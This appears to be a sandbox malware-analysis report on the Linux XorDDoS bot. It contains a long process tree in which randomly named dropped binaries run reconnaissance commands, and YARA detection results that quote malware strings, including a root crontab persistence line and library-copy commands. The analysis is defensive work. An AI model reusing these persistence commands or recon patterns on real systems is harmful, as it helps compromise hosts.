thqvayvyih (PID: 11386, Parent: 3310, MD5: 8a8795dac29dbd91def3756d2c65bc8d) Arguments: /usr/bin/thqvayvyih "grep \"A\"" 9446

thqvayvyih New Fork (PID: 11391, Parent: 11386)

dkuidbsedp New Fork (PID: 11432, Parent: 9446)

dkuidbsedp New Fork (PID: 11433, Parent: 11432)

fcpzadqmpt (PID: 11433, Parent: 3310, MD5: cc75cad92a9029b37a17aacb9017eeca) Arguments: /usr/bin/fcpzadqmpt "cat resolv.conf" 9446

fcpzadqmpt New Fork (PID: 11443, Parent: 11433)

dkuidbsedp New Fork (PID: 11434, Parent: 9446)

dkuidbsedp New Fork (PID: 11435, Parent: 11434)

fcpzadqmpt (PID: 11435, Parent: 3310, MD5: cc75cad92a9029b37a17aacb9017eeca) Arguments: /usr/bin/fcpzadqmpt "netstat -an" 9446

fcpzadqmpt New Fork (PID: 11445, Parent: 11435)

dkuidbsedp New Fork (PID: 11436, Parent: 9446)

dkuidbsedp New Fork (PID: 11437, Parent: 11436)

fcpzadqmpt (PID: 11437, Parent: 3310, MD5: cc75cad92a9029b37a17aacb9017eeca) Arguments: /usr/bin/fcpzadqmpt "cd /etc" 9446

fcpzadqmpt New Fork (PID: 11448, Parent: 11437)

dkuidbsedp New Fork (PID: 11438, Parent: 9446)

dkuidbsedp New Fork (PID: 11439, Parent: 11438)

fcpzadqmpt (PID: 11439, Parent: 3310, MD5: cc75cad92a9029b37a17aacb9017eeca) Arguments: /usr/bin/fcpzadqmpt gnome-terminal 9446

fcpzadqmpt New Fork (PID: 11442, Parent: 11439)

dkuidbsedp New Fork (PID: 11440, Parent: 9446)

dkuidbsedp New Fork (PID: 11441, Parent: 11440)

fcpzadqmpt (PID: 11441, Parent: 3310, MD5: cc75cad92a9029b37a17aacb9017eeca) Arguments: /usr/bin/fcpzadqmpt whoami 9446

fcpzadqmpt New Fork (PID: 11452, Parent: 11441)

dkuidbsedp New Fork (PID: 11487, Parent: 9446)

dkuidbsedp New Fork (PID: 11488, Parent: 11487)

ibtfyvoofm (PID: 11488, Parent: 3310, MD5: 03edbd21c1aa2730f07a68b2348159b3) Arguments: /usr/bin/ibtfyvoofm "netstat -an" 9446

ibtfyvoofm New Fork (PID: 11499, Parent: 11488)

dkuidbsedp New Fork (PID: 11489, Parent: 9446)

dkuidbsedp New Fork (PID: 11490, Parent: 11489)

ibtfyvoofm (PID: 11490, Parent: 3310, MD5: 03edbd21c1aa2730f07a68b2348159b3) Arguments: /usr/bin/ibtfyvoofm bash 9446

ibtfyvoofm New Fork (PID: 11500, Parent: 11490)

dkuidbsedp New Fork (PID: 11491, Parent: 9446)

dkuidbsedp New Fork (PID: 11492, Parent: 11491)

ibtfyvoofm (PID: 11492, Parent: 3310, MD5: 03edbd21c1aa2730f07a68b2348159b3) Arguments: /usr/bin/ibtfyvoofm "echo \"find\"" 9446

ibtfyvoofm New Fork (PID: 11496, Parent: 11492)

dkuidbsedp New Fork (PID: 11493, Parent: 9446)

dkuidbsedp New Fork (PID: 11494, Parent: 11493)

ibtfyvoofm (PID: 11494, Parent: 3310, MD5: 03edbd21c1aa2730f07a68b2348159b3) Arguments: /usr/bin/ibtfyvoofm "route -n" 9446

ibtfyvoofm New Fork (PID: 11498, Parent: 11494)

dkuidbsedp New Fork (PID: 11495, Parent: 9446)

dkuidbsedp New Fork (PID: 11497, Parent: 11495)

ibtfyvoofm (PID: 11497, Parent: 3310, MD5: 03edbd21c1aa2730f07a68b2348159b3) Arguments: /usr/bin/ibtfyvoofm "ps -ef" 9446

ibtfyvoofm New Fork (PID: 11504, Parent: 11497)

dkuidbsedp New Fork (PID: 11542, Parent: 9446)

dkuidbsedp New Fork (PID: 11543, Parent: 11542)

tlayyibcia (PID: 11543, Parent: 3310, MD5: 7cf86117f153415b6daedda78b73d36d) Arguments: /usr/bin/tlayyibcia "netstat -antop" 9446

tlayyibcia New Fork (PID: 11554, Parent: 11543)

dkuidbsedp New Fork (PID: 11544, Parent: 9446)

dkuidbsedp New Fork (PID: 11545, Parent: 11544)

tlayyibcia (PID: 11545, Parent: 3310, MD5: 7cf86117f153415b6daedda78b73d36d) Arguments: /usr/bin/tlayyibcia who 9446

tlayyibcia New Fork (PID: 11549, Parent: 11545)

dkuidbsedp New Fork (PID: 11546, Parent: 9446)

dkuidbsedp New Fork (PID: 11547, Parent: 11546)

tlayyibcia (PID: 11547, Parent: 3310, MD5: 7cf86117f153415b6daedda78b73d36d) Arguments: /usr/bin/tlayyibcia "sleep 1" 9446

tlayyibcia New Fork (PID: 11552, Parent: 11547)

dkuidbsedp New Fork (PID: 11548, Parent: 9446)

dkuidbsedp New Fork (PID: 11550, Parent: 11548)

tlayyibcia (PID: 11550, Parent: 3310, MD5: 7cf86117f153415b6daedda78b73d36d) Arguments: /usr/bin/tlayyibcia "cat resolv.conf" 9446

tlayyibcia New Fork (PID: 11557, Parent: 11550)

dkuidbsedp New Fork (PID: 11551, Parent: 9446)

dkuidbsedp New Fork (PID: 11553, Parent: 11551)

tlayyibcia (PID: 11553, Parent: 3310, MD5: 7cf86117f153415b6daedda78b73d36d) Arguments: /usr/bin/tlayyibcia pwd 9446

tlayyibcia New Fork (PID: 11555, Parent: 11553)

dkuidbsedp New Fork (PID: 11597, Parent: 9446)

dkuidbsedp New Fork (PID: 11598, Parent: 11597)

dzlsbdiinr (PID: 11598, Parent: 3310, MD5: 65badaeedebb92c5ee46db973849ecc9) Arguments: /usr/bin/dzlsbdiinr "echo \"find\"" 9446

dzlsbdiinr New Fork (PID: 11610, Parent: 11598)

dkuidbsedp New Fork (PID: 11599, Parent: 9446)

dkuidbsedp New Fork (PID: 11600, Parent: 11599)

dzlsbdiinr (PID: 11600, Parent: 3310, MD5: 65badaeedebb92c5ee46db973849ecc9) Arguments: /usr/bin/dzlsbdiinr "sleep 1" 9446

dzlsbdiinr New Fork (PID: 11609, Parent: 11600)

dkuidbsedp New Fork (PID: 11601, Parent: 9446)

dkuidbsedp New Fork (PID: 11602, Parent: 11601)

dzlsbdiinr (PID: 11602, Parent: 3310, MD5: 65badaeedebb92c5ee46db973849ecc9) Arguments: /usr/bin/dzlsbdiinr "cat resolv.conf" 9446

dzlsbdiinr New Fork (PID: 11606, Parent: 11602)

dkuidbsedp New Fork (PID: 11603, Parent: 9446)

dkuidbsedp New Fork (PID: 11604, Parent: 11603)

dzlsbdiinr (PID: 11604, Parent: 3310, MD5: 65badaeedebb92c5ee46db973849ecc9) Arguments: /usr/bin/dzlsbdiinr top 9446

dzlsbdiinr New Fork (PID: 11608, Parent: 11604)

dkuidbsedp New Fork (PID: 11605, Parent: 9446)

dkuidbsedp New Fork (PID: 11607, Parent: 11605)

dzlsbdiinr (PID: 11607, Parent: 3310, MD5: 65badaeedebb92c5ee46db973849ecc9) Arguments: /usr/bin/dzlsbdiinr pwd 9446

dzlsbdiinr New Fork (PID: 11612, Parent: 11607)

dkuidbsedp New Fork (PID: 11652, Parent: 9446)

dkuidbsedp New Fork (PID: 11653, Parent: 11652)

qwdfhkhfeq (PID: 11653, Parent: 3310, MD5: 8319fc5b221a7d18e282495ae6404206) Arguments: /usr/bin/qwdfhkhfeq bash 9446

qwdfhkhfeq New Fork (PID: 11665, Parent: 11653)

dkuidbsedp New Fork (PID: 11654, Parent: 9446)

dkuidbsedp New Fork (PID: 11655, Parent: 11654)

qwdfhkhfeq (PID: 11655, Parent: 3310, MD5: 8319fc5b221a7d18e282495ae6404206) Arguments: /usr/bin/qwdfhkhfeq sh 9446

qwdfhkhfeq New Fork (PID: 11669, Parent: 11655)

dkuidbsedp New Fork (PID: 11656, Parent: 9446)

dkuidbsedp New Fork (PID: 11657, Parent: 11656)

qwdfhkhfeq (PID: 11657, Parent: 3310, MD5: 8319fc5b221a7d18e282495ae6404206) Arguments: /usr/bin/qwdfhkhfeq "ps -ef" 9446

qwdfhkhfeq New Fork (PID: 11678, Parent: 11657)

dkuidbsedp New Fork (PID: 11658, Parent: 9446)

dkuidbsedp New Fork (PID: 11660, Parent: 11658)

qwdfhkhfeq (PID: 11660, Parent: 3310, MD5: 8319fc5b221a7d18e282495ae6404206) Arguments: /usr/bin/qwdfhkhfeq gnome-terminal 9446

qwdfhkhfeq New Fork (PID: 11680, Parent: 11660)

dkuidbsedp New Fork (PID: 11661, Parent: 9446)

dkuidbsedp New Fork (PID: 11664, Parent: 11661)

qwdfhkhfeq (PID: 11664, Parent: 3310, MD5: 8319fc5b221a7d18e282495ae6404206) Arguments: /usr/bin/qwdfhkhfeq "route -n" 9446

qwdfhkhfeq New Fork (PID: 11679, Parent: 11664)

dkuidbsedp New Fork (PID: 11707, Parent: 9446)

dkuidbsedp New Fork (PID: 11708, Parent: 11707)

ldaqsdrmbu (PID: 11708, Parent: 3310, MD5: cf6da36df699f9bdadf3a1295d7fe52d) Arguments: /usr/bin/ldaqsdrmbu "netstat -antop" 9446

ldaqsdrmbu New Fork (PID: 11720, Parent: 11708)

dkuidbsedp New Fork (PID: 11709, Parent: 9446)

dkuidbsedp New Fork (PID: 11710, Parent: 11709)

ldaqsdrmbu (PID: 11710, Parent: 3310, MD5: cf6da36df699f9bdadf3a1295d7fe52d) Arguments: /usr/bin/ldaqsdrmbu "cat resolv.conf" 9446

ldaqsdrmbu New Fork (PID: 11719, Parent: 11710)

dkuidbsedp New Fork (PID: 11711, Parent: 9446)

dkuidbsedp New Fork (PID: 11712, Parent: 11711)

ldaqsdrmbu (PID: 11712, Parent: 3310, MD5: cf6da36df699f9bdadf3a1295d7fe52d) Arguments: /usr/bin/ldaqsdrmbu id 9446

ldaqsdrmbu New Fork (PID: 11716, Parent: 11712)

dkuidbsedp New Fork (PID: 11713, Parent: 9446)

dkuidbsedp New Fork (PID: 11714, Parent: 11713)

ldaqsdrmbu (PID: 11714, Parent: 3310, MD5: cf6da36df699f9bdadf3a1295d7fe52d) Arguments: /usr/bin/ldaqsdrmbu top 9446

ldaqsdrmbu New Fork (PID: 11718, Parent: 11714)

dkuidbsedp New Fork (PID: 11715, Parent: 9446)

dkuidbsedp New Fork (PID: 11717, Parent: 11715)

ldaqsdrmbu (PID: 11717, Parent: 3310, MD5: cf6da36df699f9bdadf3a1295d7fe52d) Arguments: /usr/bin/ldaqsdrmbu "route -n" 9446

ldaqsdrmbu New Fork (PID: 11722, Parent: 11717)

dkuidbsedp New Fork (PID: 11762, Parent: 9446)

dkuidbsedp New Fork (PID: 11763, Parent: 11762)

wuipuaslsy (PID: 11763, Parent: 3310, MD5: da49eab2e2e3d98ad381b18c0720ad92) Arguments: /usr/bin/wuipuaslsy su 9446

wuipuaslsy New Fork (PID: 11773, Parent: 11763)

dkuidbsedp New Fork (PID: 11764, Parent: 9446)

dkuidbsedp New Fork (PID: 11765, Parent: 11764)

wuipuaslsy (PID: 11765, Parent: 3310, MD5: da49eab2e2e3d98ad381b18c0720ad92) Arguments: /usr/bin/wuipuaslsy pwd 9446

wuipuaslsy New Fork (PID: 11777, Parent: 11765)

dkuidbsedp New Fork (PID: 11766, Parent: 9446)

dkuidbsedp New Fork (PID: 11767, Parent: 11766)

wuipuaslsy (PID: 11767, Parent: 3310, MD5: da49eab2e2e3d98ad381b18c0720ad92) Arguments: /usr/bin/wuipuaslsy top 9446

wuipuaslsy New Fork (PID: 11771, Parent: 11767)

dkuidbsedp New Fork (PID: 11768, Parent: 9446)

dkuidbsedp New Fork (PID: 11769, Parent: 11768)

wuipuaslsy (PID: 11769, Parent: 3310, MD5: da49eab2e2e3d98ad381b18c0720ad92) Arguments: /usr/bin/wuipuaslsy "sleep 1" 9446

wuipuaslsy New Fork (PID: 11774, Parent: 11769)

dkuidbsedp New Fork (PID: 11770, Parent: 9446)

dkuidbsedp New Fork (PID: 11772, Parent: 11770)

wuipuaslsy (PID: 11772, Parent: 3310, MD5: da49eab2e2e3d98ad381b18c0720ad92) Arguments: /usr/bin/wuipuaslsy "cat resolv.conf" 9446

wuipuaslsy New Fork (PID: 11775, Parent: 11772)

dkuidbsedp New Fork (PID: 11817, Parent: 9446)

dkuidbsedp New Fork (PID: 11818, Parent: 11817)

uvaewfcsxa (PID: 11818, Parent: 3310, MD5: 052f0628948780b9e671e265706d5750) Arguments: /usr/bin/uvaewfcsxa who 9446

uvaewfcsxa New Fork (PID: 11824, Parent: 11818)

dkuidbsedp New Fork (PID: 11819, Parent: 9446)

dkuidbsedp New Fork (PID: 11820, Parent: 11819)

uvaewfcsxa (PID: 11820, Parent: 3310, MD5: 052f0628948780b9e671e265706d5750) Arguments: /usr/bin/uvaewfcsxa "netstat -an" 9446

uvaewfcsxa New Fork (PID: 11830, Parent: 11820)

dkuidbsedp New Fork (PID: 11821, Parent: 9446)

dkuidbsedp New Fork (PID: 11822, Parent: 11821)

uvaewfcsxa (PID: 11822, Parent: 3310, MD5: 052f0628948780b9e671e265706d5750) Arguments: /usr/bin/uvaewfcsxa sh 9446

uvaewfcsxa New Fork (PID: 11828, Parent: 11822)

dkuidbsedp New Fork (PID: 11823, Parent: 9446)

dkuidbsedp New Fork (PID: 11825, Parent: 11823)

uvaewfcsxa (PID: 11825, Parent: 3310, MD5: 052f0628948780b9e671e265706d5750) Arguments: /usr/bin/uvaewfcsxa whoami 9446

uvaewfcsxa New Fork (PID: 11831, Parent: 11825)

dkuidbsedp New Fork (PID: 11826, Parent: 9446)

dkuidbsedp New Fork (PID: 11827, Parent: 11826)

uvaewfcsxa (PID: 11827, Parent: 3310, MD5: 052f0628948780b9e671e265706d5750) Arguments: /usr/bin/uvaewfcsxa bash 9446

uvaewfcsxa New Fork (PID: 11834, Parent: 11827)

dkuidbsedp New Fork (PID: 11872, Parent: 9446)

dkuidbsedp New Fork (PID: 11873, Parent: 11872)

bbynnggifo (PID: 11873, Parent: 3310, MD5: a23209c49e32830c7b61347729055c82) Arguments: /usr/bin/bbynnggifo "route -n" 9446

bbynnggifo New Fork (PID: 11891, Parent: 11873)

dkuidbsedp New Fork (PID: 11874, Parent: 9446)

dkuidbsedp New Fork (PID: 11875, Parent: 11874)

bbynnggifo (PID: 11875, Parent: 3310, MD5: a23209c49e32830c7b61347729055c82) Arguments: /usr/bin/bbynnggifo whoami 9446

bbynnggifo New Fork (PID: 11894, Parent: 11875)

dkuidbsedp New Fork (PID: 11876, Parent: 9446)

dkuidbsedp New Fork (PID: 11877, Parent: 11876)

bbynnggifo (PID: 11877, Parent: 3310, MD5: a23209c49e32830c7b61347729055c82) Arguments: /usr/bin/bbynnggifo ifconfig 9446

bbynnggifo New Fork (PID: 11899, Parent: 11877)

dkuidbsedp New Fork (PID: 11878, Parent: 9446)

dkuidbsedp New Fork (PID: 11880, Parent: 11878)

bbynnggifo (PID: 11880, Parent: 3310, MD5: a23209c49e32830c7b61347729055c82) Arguments: /usr/bin/bbynnggifo "echo \"find\"" 9446

bbynnggifo New Fork (PID: 11885, Parent: 11880)

dkuidbsedp New Fork (PID: 11881, Parent: 9446)

dkuidbsedp New Fork (PID: 11884, Parent: 11881)

bbynnggifo (PID: 11884, Parent: 3310, MD5: a23209c49e32830c7b61347729055c82) Arguments: /usr/bin/bbynnggifo ifconfig 9446

bbynnggifo New Fork (PID: 11888, Parent: 11884)

dkuidbsedp New Fork (PID: 11929, Parent: 9446)

dkuidbsedp New Fork (PID: 11930, Parent: 11929)

lcbdpulcrs (PID: 11930, Parent: 3310, MD5: 944f6236abbb80bb2bff5caad0d36e00) Arguments: /usr/bin/lcbdpulcrs "netstat -an" 9446

lcbdpulcrs New Fork (PID: 11945, Parent: 11930)

dkuidbsedp New Fork (PID: 11931, Parent: 9446)

dkuidbsedp New Fork (PID: 11932, Parent: 11931)

lcbdpulcrs (PID: 11932, Parent: 3310, MD5: 944f6236abbb80bb2bff5caad0d36e00) Arguments: /usr/bin/lcbdpulcrs "sleep 1" 9446

lcbdpulcrs New Fork (PID: 11936, Parent: 11932)

dkuidbsedp New Fork (PID: 11933, Parent: 9446)

dkuidbsedp New Fork (PID: 11934, Parent: 11933)

lcbdpulcrs (PID: 11934, Parent: 3310, MD5: 944f6236abbb80bb2bff5caad0d36e00) Arguments: /usr/bin/lcbdpulcrs who 9446

lcbdpulcrs New Fork (PID: 11940, Parent: 11934)

dkuidbsedp New Fork (PID: 11935, Parent: 9446)

dkuidbsedp New Fork (PID: 11938, Parent: 11935)

lcbdpulcrs (PID: 11938, Parent: 3310, MD5: 944f6236abbb80bb2bff5caad0d36e00) Arguments: /usr/bin/lcbdpulcrs ls 9446

lcbdpulcrs New Fork (PID: 11942, Parent: 11938)

dkuidbsedp New Fork (PID: 11939, Parent: 9446)

dkuidbsedp New Fork (PID: 11941, Parent: 11939)

lcbdpulcrs (PID: 11941, Parent: 3310, MD5: 944f6236abbb80bb2bff5caad0d36e00) Arguments: /usr/bin/lcbdpulcrs "ps -ef" 9446

lcbdpulcrs New Fork (PID: 11952, Parent: 11941)

dkuidbsedp New Fork (PID: 11984, Parent: 9446)

dkuidbsedp New Fork (PID: 11985, Parent: 11984)

vrbpjcuukk (PID: 11985, Parent: 3310, MD5: c79907a39ea5c1fd2e6c1b15c7fc0ae8) Arguments: /usr/bin/vrbpjcuukk "netstat -antop" 9446

vrbpjcuukk New Fork (PID: 12003, Parent: 11985)

dkuidbsedp New Fork (PID: 11986, Parent: 9446)

dkuidbsedp New Fork (PID: 11987, Parent: 11986)

vrbpjcuukk (PID: 11987, Parent: 3310, MD5: c79907a39ea5c1fd2e6c1b15c7fc0ae8) Arguments: /usr/bin/vrbpjcuukk su 9446

vrbpjcuukk New Fork (PID: 12002, Parent: 11987)

dkuidbsedp New Fork (PID: 11988, Parent: 9446)

dkuidbsedp New Fork (PID: 11989, Parent: 11988)

vrbpjcuukk (PID: 11989, Parent: 3310, MD5: c79907a39ea5c1fd2e6c1b15c7fc0ae8) Arguments: /usr/bin/vrbpjcuukk "ls -la" 9446

vrbpjcuukk New Fork (PID: 12012, Parent: 11989)

dkuidbsedp New Fork (PID: 11990, Parent: 9446)

dkuidbsedp New Fork (PID: 11992, Parent: 11990)

vrbpjcuukk (PID: 11992, Parent: 3310, MD5: c79907a39ea5c1fd2e6c1b15c7fc0ae8) Arguments: /usr/bin/vrbpjcuukk bash 9446

vrbpjcuukk New Fork (PID: 11997, Parent: 11992)

dkuidbsedp New Fork (PID: 11993, Parent: 9446)

dkuidbsedp New Fork (PID: 11996, Parent: 11993)

vrbpjcuukk (PID: 11996, Parent: 3310, MD5: c79907a39ea5c1fd2e6c1b15c7fc0ae8) Arguments: /usr/bin/vrbpjcuukk "netstat -an" 9446

vrbpjcuukk New Fork (PID: 12001, Parent: 11996)

dkuidbsedp New Fork (PID: 12039, Parent: 9446)

dkuidbsedp New Fork (PID: 12040, Parent: 12039)

potliirubi (PID: 12040, Parent: 3310, MD5: 1ff01d36ef688ea454fac5af6af15593) Arguments: /usr/bin/potliirubi "cat resolv.conf" 9446

potliirubi New Fork (PID: 12053, Parent: 12040)

dkuidbsedp New Fork (PID: 12041, Parent: 9446)

dkuidbsedp New Fork (PID: 12042, Parent: 12041)

potliirubi (PID: 12042, Parent: 3310, MD5: 1ff01d36ef688ea454fac5af6af15593) Arguments: /usr/bin/potliirubi "grep \"A\"" 9446

potliirubi New Fork (PID: 12061, Parent: 12042)

dkuidbsedp New Fork (PID: 12043, Parent: 9446)

dkuidbsedp New Fork (PID: 12044, Parent: 12043)

potliirubi (PID: 12044, Parent: 3310, MD5: 1ff01d36ef688ea454fac5af6af15593) Arguments: /usr/bin/potliirubi su 9446

potliirubi New Fork (PID: 12067, Parent: 12044)

dkuidbsedp New Fork (PID: 12045, Parent: 9446)

dkuidbsedp New Fork (PID: 12047, Parent: 12045)

potliirubi (PID: 12047, Parent: 3310, MD5: 1ff01d36ef688ea454fac5af6af15593) Arguments: /usr/bin/potliirubi "netstat -antop" 9446

potliirubi New Fork (PID: 12052, Parent: 12047)

dkuidbsedp New Fork (PID: 12048, Parent: 9446)

dkuidbsedp New Fork (PID: 12051, Parent: 12048)

potliirubi (PID: 12051, Parent: 3310, MD5: 1ff01d36ef688ea454fac5af6af15593) Arguments: /usr/bin/potliirubi gnome-terminal 9446

potliirubi New Fork (PID: 12056, Parent: 12051)

dkuidbsedp New Fork (PID: 12094, Parent: 9446)

dkuidbsedp New Fork (PID: 12095, Parent: 12094)

qvavyybczk (PID: 12095, Parent: 3310, MD5: 813b0ad93e1e530f46c964216e20fa74) Arguments: /usr/bin/qvavyybczk whoami 9446

qvavyybczk New Fork (PID: 12108, Parent: 12095)

dkuidbsedp New Fork (PID: 12096, Parent: 9446)

dkuidbsedp New Fork (PID: 12097, Parent: 12096)

qvavyybczk (PID: 12097, Parent: 3310, MD5: 813b0ad93e1e530f46c964216e20fa74) Arguments: /usr/bin/qvavyybczk uptime 9446

qvavyybczk New Fork (PID: 12113, Parent: 12097)

dkuidbsedp New Fork (PID: 12098, Parent: 9446)

dkuidbsedp New Fork (PID: 12099, Parent: 12098)

qvavyybczk (PID: 12099, Parent: 3310, MD5: 813b0ad93e1e530f46c964216e20fa74) Arguments: /usr/bin/qvavyybczk uptime 9446

qvavyybczk New Fork (PID: 12112, Parent: 12099)

dkuidbsedp New Fork (PID: 12100, Parent: 9446)

dkuidbsedp New Fork (PID: 12102, Parent: 12100)

qvavyybczk (PID: 12102, Parent: 3310, MD5: 813b0ad93e1e530f46c964216e20fa74) Arguments: /usr/bin/qvavyybczk "netstat -an" 9446

qvavyybczk New Fork (PID: 12105, Parent: 12102)

dkuidbsedp New Fork (PID: 12103, Parent: 9446)

dkuidbsedp New Fork (PID: 12104, Parent: 12103)

qvavyybczk (PID: 12104, Parent: 3310, MD5: 813b0ad93e1e530f46c964216e20fa74) Arguments: /usr/bin/qvavyybczk who 9446

qvavyybczk New Fork (PID: 12122, Parent: 12104)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
dkuidbsedp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
dkuidbsedp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
dkuidbsedp	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0

Dropped Files

Source	Rule	Description	Author	Strings
/usr/bin/zetazkptwu	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/zetazkptwu	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/tudlcvpgbc	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/tudlcvpgbc	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/tudlcvpgbc	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/qjfxtxsijs	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/qjfxtxsijs	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/qjfxtxsijs	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/lib/libudev.so	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/lib/libudev.so	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
